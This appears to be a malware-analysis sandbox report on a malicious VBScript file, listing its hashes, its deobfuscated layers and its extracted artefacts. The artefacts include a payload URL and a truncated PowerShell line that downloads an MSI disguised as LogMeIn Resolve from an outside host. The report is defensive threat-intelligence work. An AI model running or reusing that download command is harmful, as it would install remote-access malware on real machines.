Malicious
Malicious

f1373b59a3832db6539c8a8b0be47f6b

VBScript
|
MD5: f1373b59a3832db6539c8a8b0be47f6b
|
Size: 1.2 KB
|
text/vbscript

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
f1373b59a3832db6539c8a8b0be47f6b
Sha1
707d2fd5f80f39f5f86452f2e85819b8ddbd847a
Sha256
4259fad6e4723f0c01c13febb479832fb02fdfa99cf9640c963edc6a7d69b7a2
Sha384
59aaa40cb214ffec1976765fc15ec06b60e146e15beddcb2b0e6f4155af5bb44b1e97091860c30f05913c621f5c199ee
Sha512
426a038004129577f14154032806bb0910ce6376d96ba9e2344cda985641048adbfee7c938b5cc588dc134e45adff1eac312e8b862785dd4db2202f755e74629
SSDeep
24:xdPogz4bc+A8Ft0oyKXRdXbUgblMTeq7jZDrrmUfewZvAQS7zs:bmQri7LrXI9rnfewZvAQz
TLSH
EF21FE5FD709DB722D4045AF86FB5E6CCA56410BEC0CC0B4B1DB88105B06B328BDA8D6
File Structure
f1373b59a3832db6539c8a8b0be47f6b
Malicious
f1373b59a3832db6539c8a8b0be47f6b.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://cubana.cloud/LogMeInResolve_Unattended.msi
Deobfuscated PowerShell

"(New-Object Net.WebClient).DownloadFile('https://cubana.cloud/LogMeInResolve_Unattended.msi', '"
f1373b59a3832db6539c8a8b0be47f6b (1.2 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙